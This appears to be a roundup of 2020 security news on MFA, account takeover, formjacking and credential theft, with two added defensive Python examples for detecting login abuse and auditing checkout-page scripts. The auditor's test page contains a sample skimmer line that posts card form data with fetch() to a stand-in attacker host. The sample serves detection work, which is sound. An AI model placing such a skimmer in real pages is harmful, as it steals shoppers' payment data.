Multi-factor authentication (MFA) that depends on one of the authentication factors being delivered via SMS or voice call should be avoided, Alex Weinert, Director of Identity Security at Microsoft, opined.
That’s not to say that MFA should be avoided, though, just that there are safer and more reliable ways to get additional authentication factors.
Why SMS- and voice-based MFA is the least secure option
Last year, Weinert noted that using any form of MFA is better than relying just on a password for security, as it “significantly increases the costs for attackers, which is why the rate of compromise of accounts using any type of MFA is less than 0.1% of the general population.”
But the delivery of authentication factors via the public switched telephone network (PSTN) is the least secure of the MFA methods available, he thinks, because:
- The SMS and voice formats aren’t adaptable to user experience expectations, technical advances, and attacker behavior in real-time
- PSTN systems are not 100% reliable, meaning the message or call may not come when needed
- Changing regulations may get in the way of SMS delivery and phone calls
- SMSes and phone calls were designed without encryption and can be intercepted (e.g., via software-defined radios, femtocells, SS7 intercept services, mobile malware, phishing tools)
- Support agents at companies operating the public switched telephone network can be tricked, bribed or coerced by attackers into providing access to the victims’ SMS or voice channel (e.g., via SIM swapping)
MFA is a must
The value of multi-factor authentication is not in question, but as more and more users adopt it, attackers will try to come up with new ways to grab the needed OTP authentication codes.
Weinert advised users to, if possible, switch from SMS- and voice-based MFA to app-based authentication. Naturally, he endorsed the Microsoft Authenticator app, but there are other apps that serve the same function (such as Google Authenticator or Cisco’s Duo Mobile) and offer the same protections (encrypted communication, more control, etc.).
There are other MFA options available, and some offer an even greater degree of safety against remote attacks, such as smart cards or security keys: physical devices an attacker would need to get hold of in order to gain access to the secured accounts. A FIDO security key also signs a challenge bound to the site’s origin, so a phishing page cannot relay its response the way it can relay an SMS or app-generated code.
Attempted account takeover (ATO) attacks swelled 282 percent between Q2 2019 and Q2 2020, Sift reveals. Likewise, ATO rates for physical ecommerce businesses (those that sell physical goods online) jumped 378 percent since the start of the COVID-19 pandemic, indicating that fraudsters are leaning heavily on this attack vector in order to steal payment information and rewards points stored in online accounts on merchant websites.
According to Deloitte, ecommerce sales are forecast to grow 25-35 percent and are expected to generate between $182 billion and $196 billion this season.
When combined with the surge in ATO rates, the 2020 holiday shopping season presents the perfect opportunity for fraudsters to leverage account takeovers to take advantage of more people shopping online. This can have a devastating impact on companies including financial repercussions and brand abandonment.
Account hacking leads to brand abandonment
According to the research, ATO attacks also create significant and lasting brand damage. Based on a survey of 1,000 U.S. adult consumers, 28 percent of respondents would completely stop using a site or service if their accounts on that site were hacked.
And while consumers can secure their accounts by leveraging tools like password managers, multi-factor authentication (MFA), and by using unique passwords, they largely ignore these best practices. In fact, 66 percent of consumers surveyed either don’t use any type of password manager or aren’t sure if they do, despite 52 percent of them having concerns about becoming victims of ATO in the future, and 25 percent reporting that they have already had their accounts hacked at least once before.
- Attacks are fueled by automation: Between Q2 2019 and Q2 2020, ATO attacks happened in discrete waves about a week apart, indicating that fraudsters are turning to bots and automation in order to overwhelm trust & safety teams.
- Fraudsters sneak in and cash out: Of those who have experienced ATO, 41 percent of respondents reported that payment details were stolen and used to make purchases, and 37 percent of victims had money taken directly from their accounts. Another 37 percent had rewards points or credits taken and used to buy goods and services.
- Ecommerce is in the crosshairs: Of consumers who confirmed being victims of ATO attacks, a whopping 61 percent said their ecommerce (both physical and digital goods and services) accounts were hacked.
- Other online destinations on which consumers reported experiencing ATO include:
- Social media sites: 36 percent
- Financial services sites: 35 percent
- Online dating sites: 22 percent
- Travel sites: 19 percent
ATO attacks for financial gain
Like payment fraud and content abuse (two of the other links in the fraud supply chain), account takeover is typically a means to a financial end.
Using credentials either illicitly purchased on the dark web or obtained through techniques like credential stuffing, hackers gain access to user accounts on a business’s website and then make purchases on that website using stored payment information or rewards points. Attackers may also export the stored information in order to commit fraud across the web.
While consumers may be the immediate victim of these attacks, businesses ultimately face the real costs: in addition to reimbursing hacked customers, businesses face exorbitant chargeback fees and payment network fines when ATO leads to payment fraud.
Customer security as customer experience
“The surge in ATO attacks indicates that merchants can’t leave the burden of account security to their customers. Rather, companies should treat account protection as part of the overall customer experience and as a key part of their Digital Trust & Safety strategy, which allows for seamless transactions while preventing fraud.”
Video conferencing platform Zoom is finally offering all users the option to enable two-factor authentication (2FA) to secure their accounts against credential stuffing attacks and attacks leveraging phished login credentials.
How to enable Zoom 2FA on a Pro, Business, Education, or Enterprise account
Zoom gives the choice between two modes of delivery of the second authentication factor (a 6-digit code):
- Via a 2FA app that supports the Time-based One-Time Password (TOTP) protocol – e.g., Google Authenticator, Microsoft Authenticator, or FreeOTP
- Via SMS (text message)
Account owners/admins can enable the option at the account-level by:
1. Signing in to the Zoom Dashboard.
2. In the navigation menu, clicking Advanced, then Security.
3. Enabling the Sign in with Two-Factor Authentication option.
4. Specifying users to enable 2FA for:
- All users in the account
- Users with specific roles
- Users belonging to specific groups
5. Clicking Save.
Once that’s done, they can inform the users about the option and provide instructions on how to take advantage of it.
As it’s usual with these things, once users set up the option, they are also provided with backup codes to use in case they misplace their phone, uninstall their 2FA app or remove Zoom from the 2FA app by mistake. If they lose those, there’s always the option to ask their admin to reset their 2FA setup.
How to enable Zoom 2FA on a (free) Basic account
Users who have opted for a Basic account can set up 2FA by:
- Signing in to their account via the Zoom web portal
- In the navigation menu, clicking Profile, then enabling Two-Factor Authentication by clicking Turn on
- Entering their password into the pop-up box
- Opting for one of the two delivery methods (authenticator app or SMS) and setting it up.
Once they’ve set up 2FA, they can make changes in the same place (the Profile tab).
Zoom and security
Since its popularity and user base skyrocketed in the wake of the COVID-19 pandemic, Zoom has been working on fixing many security and privacy issues.
More recently, Zoom Video Communications announced that it is working on providing end-to-end encryption (E2EE) to both paying Zoom customers and those with free (Basic) accounts.
Applications are a gateway to valuable data, so it’s no wonder they are one of attackers’ preferred targets.
And since modern applications aren’t a monolithic whole but consist of many separate components “glued together” over networks, attackers have at their disposal many “doors” through which they can attempt to access the data.
Easy targets will remain popular
Some of these doors are more popular than others. According to the latest Application Protection Report by F5 Networks, attackers love to:
1. Target PHP applications.
“PHP is a widespread and powerful server-side language that’s been used in 80% of sites on the web since 2013. It underpins several of the largest web applications in the world, including WordPress and Facebook,” F5 analysts explained the attraction.
2. Engage in injection attacks and formjacking (the latter especially when targeting the retail sector).
In 2019, formjacking of payment cards was responsible for 87% of web breaches and 17% of known breaches in total (up from 71% and 12% in 2018). In 2019, the retail sector was the most significant formjacking target: 81 percent of retail breaches were from formjacking attacks, while nearly all other sectors tended to be breached most often through the access tier.
“The lesson is clear: for any organization that accepts payment card via the web, their shopping cart is a target for cyber-criminals,” the analysts pointed out.
3. Get access to accounts (and especially email accounts) via phishing, brute forcing, credential stuffing or stolen credentials.
“Access tier attacks are any that seek to circumvent the legitimate processes of authentication and authorization that we use to control who gets to use an application, and how they can use it. The result of this kind of attack is a malicious actor gaining entry to a system while impersonating a legitimate user. They then use the legitimate user’s authorization to accomplish a malicious goal— usually data exfiltration,” the analysts explained.
Attackers use a number of tactics to keep these attacks unnoticed, but organizations also have a lot of defensive options at their disposal to prevent them.
4. Go after unmonitored, vulnerable, poorly secured or misconfigured APIs.
“In the days of monolithic apps, whatever core business logic generated value needed to be supported by a user interface, storage, and other meta-functions. Now it is sufficient to develop a single specialized service, and use APIs to either outsource other functions to bring an app to market, offer the service to other app owners, or both,” the analysts explained.
Their widespread use makes them a big target, and a combination of factors makes them a rich one:
- They are often configured with overly broad permissions
- They often lack visibility and monitoring.
There are solutions to these problems
Attackers go where the data is, and that’s why organizations in each sector/industry should develop risk-based security programs and tailor controls and architecture to reflect the threats they actually face, the analysts advise.
To counter access attacks, organizations should implement multi-factor authentication where fitting and possible, but should also consider:
- Checking passwords against a dictionary of default, stolen, and well-known passwords
- Making sure the system can detect and prevent brute force attacks by, for example, using CAPTCHA, slowing down sessions, setting up alarms, etc.
- Creating simple methods for users to report suspected phishing
- Encrypting or eliminating confidential data from the organization’s email caches
- Enabling logging (to be able to discover what the attackers did when they gained access).
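The first two items in that list can be implemented in a few dozen lines. The following added example (written for this page, not F5’s code) does both in Python: a per-source sliding-window detector that separates credential stuffing (many usernames from one IP, mostly failing, because each leaked pair is tried once) from brute force (many failures against one username), run over constructed login-log lines in a hypothetical format; and a breached-password check using the k-anonymity pattern, in which only the first five hex characters of SHA-1(password) would be sent to a range service. The range service is replaced here by an in-memory stand-in with invented suffixes and counts. The log format and thresholds are assumptions and should be tuned to real traffic.

```python
import hashlib
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed login-log lines in a hypothetical web-tier format (not any product's real format).
# 203.0.113.5 tries six different accounts in three seconds; 198.51.100.7 hammers one account;
# 192.0.2.9 is an ordinary user logging in once.
SAMPLE_LOG = """\
2020-11-10T10:00:01Z ip=203.0.113.5 user=alice result=fail
2020-11-10T10:00:01Z ip=203.0.113.5 user=bob result=fail
2020-11-10T10:00:02Z ip=203.0.113.5 user=carol result=fail
2020-11-10T10:00:02Z ip=203.0.113.5 user=dave result=success
2020-11-10T10:00:03Z ip=203.0.113.5 user=erin result=fail
2020-11-10T10:00:03Z ip=203.0.113.5 user=frank result=fail
2020-11-10T10:00:10Z ip=198.51.100.7 user=admin result=fail
2020-11-10T10:00:11Z ip=198.51.100.7 user=admin result=fail
2020-11-10T10:00:12Z ip=198.51.100.7 user=admin result=fail
2020-11-10T10:00:13Z ip=198.51.100.7 user=admin result=fail
2020-11-10T10:00:14Z ip=198.51.100.7 user=admin result=fail
2020-11-10T10:05:00Z ip=192.0.2.9 user=alice result=success
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) ip=(?P<ip>\S+) user=(?P<user>\S+) result=(?P<result>\S+)$")


def parse_log(text):
    """Parse lines into (timestamp, ip, user, succeeded) tuples, skipping malformed lines."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append((ts, m["ip"], m["user"], m["result"] == "success"))
    return events


def detect(events, window=timedelta(minutes=1), stuffing_users=5, brute_fails=5):
    """Per-source-IP sliding window over login events (thresholds are assumptions).

    credential stuffing: >= stuffing_users distinct usernames inside the window, majority failing;
    brute force: >= brute_fails failures against the same username inside the window."""
    findings = set()
    recent = defaultdict(list)                      # ip -> events inside the window, oldest first
    for ts, ip, user, ok in sorted(events):
        bucket = recent[ip]
        bucket.append((ts, user, ok))
        while bucket and bucket[0][0] < ts - window:  # drop events that fell out of the window
            bucket.pop(0)
        failed_users = [u for _, u, succeeded in bucket if not succeeded]
        distinct_users = {u for _, u, _ in bucket}
        if len(distinct_users) >= stuffing_users and len(failed_users) > len(bucket) / 2:
            findings.add(("credential_stuffing", ip))
        for u in set(failed_users):
            if failed_users.count(u) >= brute_fails:
                findings.add(("brute_force", ip, u))
    return findings


# Constructed stand-in for a k-anonymity password-range service (the same shape as the Pwned
# Passwords range API, but the suffixes and counts below are invented). The client sends only
# the first five hex characters of SHA-1(password); the service answers with every suffix it
# knows under that prefix, so the full hash of the candidate password never leaves the client.
FAKE_RANGE_DB = {
    "5BAA6": {
        "1E4C9B93F3F0682250B6CF8331B7EE68FD8": 1_000_000,   # SHA-1("password"); count is made up
        "0C6A3D2F1B5E7A9C8D4F2E1B3A5C7D9E0F1": 2,           # unrelated suffix, made up
    },
}


def local_range_lookup(prefix):
    return FAKE_RANGE_DB.get(prefix, {})


def breach_count(password, range_lookup=local_range_lookup):
    """Return how often the password appears in the breach corpus (0 = not found)."""
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    prefix, suffix = digest[:5], digest[5:]
    return range_lookup(prefix).get(suffix, 0)


if __name__ == "__main__":
    for finding in sorted(detect(parse_log(SAMPLE_LOG))):
        print(finding)
    print("breach count for 'password':", breach_count("password"))
```

In production the range lookup is an HTTPS call and the detector reads from the authentication service’s logs; the point of the example is the shape of the two signals (distinct usernames versus repeated username) and that the password check can be done without disclosing the password or its full hash to a third party.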
Spotting and foiling injection and formjacking attacks can be done by securing servers, patching injection vulnerabilities, employing change control, using web application firewalls (WAFs), and testing and monitoring all third-party components on sites with forms that accept critical information.
But organizations should be aware that the injection landscape is constantly changing, and they have to follow the trends and adapt.
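Monitoring the third-party components on a payment page, as recommended above, is easy to automate. The following is an added example (written for this page, not F5’s code) that parses a constructed checkout page with Python’s html.parser, inventories every script element, and flags what a formjacking skimmer typically introduces: a script loaded from a host not on the deploy-time allowlist, a cross-origin script without a Subresource Integrity attribute, and an inline script whose SHA-256 hash is not in the baseline recorded under change control. The page host, hostnames, allowlist and baseline are all invented for the example.

```python
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed checkout page. Everything up to the <form> is what change control recorded at the
# last deploy; the two script tags after the form are the kind of addition a skimmer makes.
KNOWN_INLINE = 'window.cfg = {form: "#payment"};'
CHECKOUT_HTML = f"""<html><head>
<script src="/static/checkout.js"></script>
<script src="https://cdn.example-psp.com/pay.js" integrity="sha384-constructedDigestValue"></script>
<script src="https://cdn.example-psp.com/analytics.js"></script>
<script>{KNOWN_INLINE}</script>
</head><body>
<form id="payment"><input name="card"><input name="cvv"></form>
<script src="https://stats.evil-cdn.example/x.js"></script>
<script>document.querySelector('#payment').addEventListener('submit', e => fetch('https://stats.evil-cdn.example/c', {{method: 'POST', body: new FormData(e.target)}}));</script>
</body></html>"""


class ScriptCollector(HTMLParser):
    """Collects every <script> element: its src, its integrity attribute and its inline body."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            a = dict(attrs)
            self._current = {"src": a.get("src"), "integrity": a.get("integrity"), "body": ""}

    def handle_data(self, data):
        if self._current is not None:          # HTMLParser hands script bodies over as raw data
            self._current["body"] += data

    def handle_endtag(self, tag):
        if tag == "script" and self._current is not None:
            self.scripts.append(self._current)
            self._current = None


def sha256_hex(text):
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def audit_scripts(html, page_host, allowed_hosts, baseline_inline_hashes):
    """Return findings for scripts that deviate from the recorded baseline."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for s in collector.scripts:
        if s["src"]:
            host = urlparse(s["src"]).netloc or page_host   # relative URL -> same origin
            if host == page_host:
                continue                                     # first-party, covered by deploy integrity
            if host not in allowed_hosts:
                findings.append(f"unknown-host: {s['src']}")
            elif not s["integrity"]:
                findings.append(f"no-sri: {s['src']}")
        else:
            digest = sha256_hex(s["body"].strip())
            if digest not in baseline_inline_hashes:
                findings.append(f"unknown-inline: sha256-{digest[:16]}...")
    return findings


def run_sample():
    """Audit the constructed page against its (invented) allowlist and inline-script baseline."""
    return audit_scripts(
        CHECKOUT_HTML,
        page_host="shop.example",
        allowed_hosts={"cdn.example-psp.com"},
        baseline_inline_hashes={sha256_hex(KNOWN_INLINE)},
    )


if __name__ == "__main__":
    for finding in run_sample():
        print(finding)
```

Run against the rendered page on a schedule and alert on any new finding; the same allowlist and inline hashes can be enforced in the browser with a Content-Security-Policy script-src directive, which turns the detection into prevention.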
Finally, organizations can mitigate the risk of API attacks by:
- Making (and maintaining) an inventory of their APIs
- Deploying authentication for them and storing credentials securely
- Limiting their permissions
- Monitoring them (by logging connections and reviewing them)
- Encrypting the API connections
- Testing APIs
- Implementing API security tools.
Since the COVID-19 outbreak, digital fraud has increased significantly, especially when it comes to account takeover. In this Help Net Security podcast, Angie White, Senior Product Marketing Manager at TransUnion, explores ATO and social engineering attacks and offers some suggestions on how to address these threats.
Here’s a transcript of the podcast for your convenience.
Hello. This is Angie White, Senior Product Marketing Manager for TransUnion Global Fraud and Identity Solutions. Today we’re going to dive into how COVID-19 is driving an increase in account takeover as well as providing some suggestions on how to combat it.
Before we get too into the weeds, let’s just quickly level set on a definition of account takeover or ATO. Account takeover is when a legitimate customer’s account is accessed through illicit means for the purpose of committing fraud. Account takeover isn’t a new phenomenon. It’s something that’s been around in financial services and banking for a long time, but we’ve seen a rapid increase in segments such as e-commerce, insurance, telecommunications in recent years.
How is COVID-19 driving an increase in account takeover? We’re seeing two primary factors. First off is just the increase in volume, as consumers have been forced to turn to digital channels because they can no longer go to their local bank, go to their local store. It’s really made it easier for fraudsters to hide in that uptick of volume. Secondly, you see that fraudsters are taking advantage of the chaos using the uncertainty to victimize consumers.
Looking at our data, we’re seeing big spikes for sectors such as banking, telecommunications, e-commerce. As an example, we saw a 23% increase in e-commerce traffic the week of March 11th to 18th, so that was the week following the declaration by the World Health Organization of the pandemic. This left many businesses trying to shore up work from home operations, secure their sites and deal with increases in volume both on their sites but also in their contact centers.
The Aite group estimates that banks have seen spikes in call center volume at around 40%, so that’s quite the increase. Likewise, telecommunications providers have seen spikes ranging around 25%. Never missing an opportunity, fraudsters have also taken advantage of a chaos to perpetrate more fraud, and in an analysis of transactions we protect, we found a 14% increase in risky transactions for financial services since March 11th. So, we’re definitely seeing that already play out for our customers.
Also, looking at the consumer impact, TransUnion polled over 3000 Americans, 18 and older, on how COVID-19 is impacting them. 28% of respondents indicated that they had already been targeted by a digital fraud scam related to COVID-19, and this was up from the previous week where 23% had indicated that they had already been targeted. So, a 5% increase in one week. This really highlights that this trend is likely to accelerate. Of those consumers, 10% of Gen-Z and 9% of Millennials indicated that they had already fallen victim to a COVID-19 scam. So, we’re seeing approximately a third of those scams be successful.
There are a number of attack methods used to perpetrate account takeover, but for our purposes I’m only going to hit on three of the most common methods: phishing scams, social engineering and credential stuffing.
Phishing scams. You’ve likely all seen these emails, they look very legitimate or it could be a phone call or legitimate looking website. Fraudsters are using the current crisis to send out prevention tips for COVID-19, news updates, promising information about stimulus checks, using that to steal login credentials and personal data through various means. Unfortunately, consumers have a bad habit of reusing login credentials. That means that such compromises will likely lead to an uptick in account takeover across all industries and across the board.
Social engineering can come in a number of flavors. One attack method is to gather information that is publicly available about a consumer, from sources such as social media or that have been gained from phishing attacks. In the age of social media, consumers have gotten in the habit of oversharing, so publicly posting about things like attending a high school reunion, that makes it very easy for a fraudster to then go and search on that high school, find out who their mascot is, find out what their hometown is. Those are all pieces of information that can be used in social engineering to answer KBA questions, to socially engineer contact center agents and gain access to an account.
Another flavor of social engineering that we see is what we term romance scams. This is where a bad actor ingratiates themselves with an intended victim. We actually had a real use case with one of our customers, a very large telecom provider, where fraudsters were going out ingratiating themselves with lonely people on dating sites and getting them to give them their login credentials with the promise that they would go and add a phone line, get a phone so that they could talk more.
Of course, the fraudsters go in, they add 10 lines, order 10 new phones and create big losses for the business and a lot of dissatisfaction for that customer. I’ll talk through some ways that they shut that down in just a moment.
Lastly, credential stuffing. This is when fraudsters, they take stolen credentials, gained through phishing attacks or in many cases simply bought off the dark web, and they test those stolen credentials against a site to see what accounts they can gain access to. These attacks are often automated using bots. When they find a good account, they go in, they can take it over. And what’s more is they use those good credentials, not only on that site, they move from site to site, seeing if they’ll work on other platforms.
So again, with the attacks that we’re seeing due to COVID-19, with the increase in phishing scams, increased breached credentials, personal data, that’s all going to drive more credential stuffing attacks.
There’s a number of measures that businesses can take to mitigate account takeover. I’m going to break it out by customer touch points. So let’s start at login.
You really do need to go beyond username and password to secure customer accounts. With all the breaches, all the phishing attacks, you really do need to move forward with the assumption that your consumers’ credentials have been compromised. There’s a number of options that are easy to layer onto existing authentication solutions depending on the need of your business. Things such as one-time passcodes, or OTP, multifactor authentication, captcha. At TransUnion, we recommend device-based authentication. This essentially pairs the consumer device to their account using it as a mode of authentication.
I touched on the romance scams a little earlier. This is exactly how that telecom provider shut down account takeover in their service, so they implemented device-based authentication. They were able to pair good user devices to their accounts, that way, if a fraudster came in, even with the correct credentials, they could see that that device was not authorized to access that account, so very effective for them in shutting down account takeover.
Device-based authentication also gives you a lot of risk insight that isn’t available for most other authentication methods. Things like unusual velocities, geolocation mismatches, or the use of anonymizing proxies, so somebody’s trying to make it look like they’re coming from a mobile device when you can really see that they’re using an emulator and coming from a laptop.
The next point of risk is account management. Once fraudsters have gained access to an account, they of course want to change account details such as email or shipping address so they can take over the account.
Again, there’s a number of methods where you can protect account management. You can add verification checks such as verifying email, phone, address. Another very effective method is using push authentication. With this, you can push an authentication request to the user’s device to authenticate with, say, a thumbprint or a PIN that they did initiate that change to their account.
One of the benefits of this is that you can use it for any channel. So, if somebody is requesting changes via the web, via your application, or even via the contact center, you can push that authentication request directly to the user’s device to authenticate before proceeding with the change.
As your business starts to operate in the new normal that is COVID-19, it’s really important to think through what are your points of risk across your customer journey and how can you add protection without adding too much friction. Unfortunately, there isn’t a silver bullet for shutting down ATO because there are many points of risk across the customer journey and many different attack methods.
Businesses are really going to have to examine what are their points of risk in the customer journey, how can they protect those points of risk without adding too much friction and create the new normal in the COVID-19 era. Stay safe out there.
While most consumers are taking the necessary security precautions to protect their online accounts, businesses may not be doing enough to protect their information, inadvertently driving sales to competitors that are, Arcserve research reveals.
A survey of nearly 2,000 consumers across North America, the United Kingdom, France, and Germany, found that 70% believe businesses aren’t doing enough to adequately secure their personal information and assume it has been compromised without them knowing it. And, as consumers become more educated and cyberattacks become well-known, perceived trust becomes more influential in their purchasing decisions, with the study also finding that:
- Nearly nine of ten consumers consider the trustworthiness of a business prior to purchasing a product or service and,
- 59% of consumers would likely avoid doing business with an organization that had experienced a cyberattack in the past year.
These findings suggest businesses must manage uncharted challenges with the rise of cybercriminals now making breaches public, regardless of ransoms paid.
Ransomware-related service disruption: Consumer tolerance threshold
Cyberattacks have arguably become the largest business threat; however, their quantifiable impact on consumer behavior has not been widely understood. The study found that one in four consumers will abandon a product or service in favor of a competitor after a single ransomware-related service disruption, failed transaction, or instance of inaccessible information.
It also found that tolerance for these events quickly deteriorates, with:
- Over 66% of respondents citing they would turn to a competitor if an organization couldn’t restore systems and applications within three days following a cyberattack and,
- Over a third of those would be willing to switch after a mere 24 hours of waiting to access their information or make a transaction.
Moreover, the potential damage doesn’t stop during or shortly after a cyberattack. More than eight in ten respondents admit to sharing their negative, ransomware-related experiences with family, friends or colleagues, posting about their experiences online, or emailing about the incidents.
Certain industries fare better than others
While the report concludes that consumers are generally intolerant of cyberattacks, there are a few industries where businesses are under even more pressure to keep data secure and operations running. The survey found that:
- Nearly half of consumers would walk away from their banking or securities provider immediately upon experiencing a ransomware-related event which prohibited them from transacting or accessing information and,
- 43% would immediately seek out a competitive communications product or service.
While there are many negative ramifications caused by cyberattacks, businesses that take proactive steps and mitigate ransomware quickly will benefit in the long run.
Over half of respondents would be willing to pay more for products and services they believe to be more reliable and secure in the banking and securities industries, and over 40% would pay more if they believed products and services were more secure from companies in the healthcare, insurance, and retail categories.
“Consumers are clearly already hesitant about working with companies hit by cyberattacks, and they just won’t tolerate disruption as businesses figure out recovery and remediation plans after-the-fact,” said Arcserve CTO Oussama El-Hilali.
“The findings represent a stark warning for all organizations given that one in four of their customers will be gone immediately upon disruption, with many more losing patience within 48 hours.
“Businesses must do more to ensure they’re protecting their data from cybercriminals and mitigating the chance they’ll experience extended downtime. We recommend a two-pronged approach where cybersecurity, backup and disaster recovery are deeply entwined.”
After recently directly notifying a number of hospitals about vulnerable gateway and VPN appliances in their infrastructure, Microsoft has decided to offer its AccountGuard threat notification service for free for healthcare and worldwide human rights and humanitarian organizations.
“AccountGuard is available to organizations using Office 365 for business email and extends additional security to the personal accounts of their front line workers who use Microsoft’s consumer email services such as Outlook.com and Hotmail,” Tom Burt, Microsoft’s Corporate VP on Customer Security & Trust, explained.
“Both AccountGuard for Healthcare and AccountGuard for Human Rights Organizations will initially be available to organizations in the 29 countries where we already offer AccountGuard, subject to review of local laws and regulations, and we will be adding new countries based on need and local law.”
Microsoft AccountGuard and the new offer for healthcare
Launched in 2018 and previously available only to political campaigns, parties, members of the U.S. Congress and democracy-focused non-profits, the AccountGuard service warns the owners of enrolled accounts about ongoing attacks by nation-state hackers.
“Healthcare organizations can sign up here, and human rights and humanitarian organizations can sign up here,” Burt noted. AccountGuard for Healthcare will be available until the COVID-19 pandemic subsides.
The threat notification service is now available for free to: hospitals and care facilities, clinics, labs, and clinicians that provide frontline care to patients; pharmaceutical, life sciences, and medical device companies that research, develop, and manufacture COVID-related treatments and drugs; non-governmental organizations (NGOs) and international non-governmental organizations (INGOs) involved in the response to the COVID-19 pandemic; and select individuals (with Outlook.com and Hotmail.com personal emails) invited to participate by an eligible organization.
Participation in AccountGuard for Human Rights Organizations is offered by invitation only.
“Leading human rights and humanitarian organizations including Amnesty International, CyberPeace Institute, Freedom House, Human Rights Watch and Physicians for Human Rights have already registered for our AccountGuard threat notification service through an initial pilot,” Burt added.
Most attacks start with phishing emails
“An attacker will often disguise malicious content as a message from a health authority or medical equipment provider. These emails sent to work or home inboxes seek to obtain the person’s credentials and often contain documents or links that will infect a computer and spread the infection through a network, enabling attackers to control it,” he explained.
Attackers targeting healthcare organizations are after COVID-19-related intelligence and/or are looking to disrupt the provision of desperately needed care or supplies. Those probing human rights or humanitarian organizations are after intelligence on these organizations and the people who these groups protect, or want to disrupt their work.
Since the start of the year, journalists and news outlets have become preferred targets of government-backed cyber attackers, Google’s Threat Analysis Group (TAG) has noticed.
“For example, attackers impersonate a journalist to seed false stories with other reporters to spread disinformation. In other cases, attackers will send several benign emails to build a rapport with a journalist or foreign policy expert before sending a malicious attachment in a follow up email,” shared Toni Gidwani, a security engineering manager at TAG.
Government-backed attackers also target foreign policy experts – for their research, access to the organizations they work with, and connection to fellow researchers or policymakers for subsequent attacks – as well as government officials, dissidents and activists.
Protecting Google accounts
Aside from trying to deliver malware to compromise the targets’ computer and/or smartphone, the attackers are also trying to compromise their online accounts – repeatedly.
“In 2019, one in five accounts that received a [government-backed phishing or malware attack] warning was targeted multiple times by attackers. If at first the attacker does not succeed, they’ll try again using a different lure, different account, or trying to compromise an associate of their target,” Gidwani said, and boasted about the effectiveness of Google’s protections when it comes to phishing and account hijacking.
“We’ve yet to see people successfully phished if they participate in Google’s Advanced Protection Program (APP), even if they are repeatedly targeted,” she claimed.
Google’s APP provides additional account security for those who are at an elevated risk of targeted attacks, by: requiring the person logging in to present a specific physical security key (as well as the password), preventing untrusted third-party apps from accessing the account, providing added download protection, insisting on a stricter account recovery process, etc.
The attackers haven’t failed to notice the effectiveness of the protections, Gidwani says, and have slowed down their onslaught. “In 2019, we sent almost 40,000 warnings, a nearly 25 percent drop from 2018,” she noted.
Google’s TAG also discovers attacks and tracks attackers exploiting zero-day vulnerabilities in popular software – in 2019, they discovered zero-day vulnerabilities affecting Android, Chrome, iOS, Internet Explorer and Windows.
“Last year, TAG discovered that a single threat actor was capitalizing on five zero-day vulnerabilities,” she shared.
“Finding this many zero-day exploits from the same actor in a relatively short time frame is rare. The exploits were delivered via compromised legitimate websites (e.g. watering hole attacks), links to malicious websites, and email attachments in limited spear phishing campaigns. The majority of targets we observed were from North Korea or individuals who worked on North Korea-related issues.”
Have you secured your streaming services’ accounts? Are you sure someone else, unbeknown to you, isn’t using them as well?
As people around the world are being asked to remain in their homes due to the coronavirus pandemic, many are turning to streaming services such as Netflix, Hulu, Disney+, Spotify, and Apple Music for entertainment, Proofpoint cybersecurity strategist Adenike Cosgrove notes.
Cosgrove also posits that, although cybercriminals have been compromising users’ streaming service accounts for ages, they will now likely step up their efforts.
How do criminals usually steal streaming credentials?
Streaming credentials are usually stolen via malware (information-stealing Trojans) or fake login/phishing pages:
Criminals are also trying out credentials leaked after data breaches. If the user has reused them for their streaming accounts, their compromise is, effectively, just a matter of time.
Finally, they sell the compromised login credentials for a fraction of the price of a legitimate subscription:
“At this point there is a very mature, operationalized market for stolen streaming credentials,” Proofpoint researchers noted. “When attackers get your streaming credentials, they sell them to others who will use them to log on and piggyback off of your streaming services, likely without you even knowing it.”
What can you do to protect your online streaming accounts?
None of the aforementioned streaming services offer two-factor authentication to their customers, so the security of those accounts still depends on users:
- Choosing a strong, long and unique password that they will not reuse for other accounts
- Being able to spot and avoid phishing pages
- Being able to avoid getting infected with info-stealing malware.
The researchers advised users to keep their operating system, browsers and plug-ins up to date and not click on links embedded in emails or attachments to visit a streaming site.
“It is also important to always use a unique strong password for each of your streaming sites, ideally in conjunction with a password manager,” they added.
“Additionally, many streaming services now provide an option that notifies you anytime a new device connects to your account. Selecting this option will allow you to verify that each device is authorized and take action if it is not.”
Users who, when reviewing the recent streaming activity associated with their account, spot an unknown device logged into it should first change the account password, then sign out all devices and, finally, sign in again with the new password. This will lock any unauthorized user out of the account.
It is worth adding that if your account has been compromised, so has the information it holds, including payment card information. Users would do well to cancel that card and be on the lookout for fraud and identity theft attempts leveraging the compromised information.
SpyCloud reveals that 9,050,064,764 credentials were recovered throughout 2019, coming from a total of 640 unique data breaches and including email addresses paired with plaintext passwords and usernames paired with plaintext passwords.
That means, on average, each of these data breaches gave criminals more than 14 million sets of login credentials. Because people often reuse passwords across several accounts, both personal and for work, each set of login credentials could be used to access dozens or more accounts through which cybercriminals can perpetrate fraud.
Credential exposure report
Almost a third of internet users affected by data breaches last year had reused a password in some form. 94% of those who recycled passwords reused the exact same password, while the other 6% made minor changes such as capitalizing the first letter or adding numbers to the end of their typical password. These tactics are easily defeated by tools, which test for common, slight variations.
In terms of organizational security, there is a worrying trend: more of the data criminals are sharing and selling came from breaches of misconfigured or unsecured servers. Organizations may also be taking incomplete steps to protect passwords.
Criminals still using passwords they stole in 2012
The researchers found that more than half (53.7%) of the plaintext passwords recovered were originally protected using the outdated hashing algorithms SHA-1 and MD5.
Security professionals have recommended against using SHA-1 since about 2005, and against using MD5 since as far back as 1996, because cybercriminals can easily and quickly crack passwords hashed with these functions and recover plaintext passwords.
“Our data shows that consumers are still not changing their poor password habits, yet we know they’re holding organizations accountable for their security,” said David Endler, chief product officer for SpyCloud.
“Criminals are still using passwords they stole in 2012 to attack and take over accounts today. Companies need to guide users to set better passwords at the time of account creation and they need to help users maintain strong, uncompromised passwords whenever their credentials are exposed in a breach anywhere in the world.”
World’s most popular passwords protecting some 125 million accounts
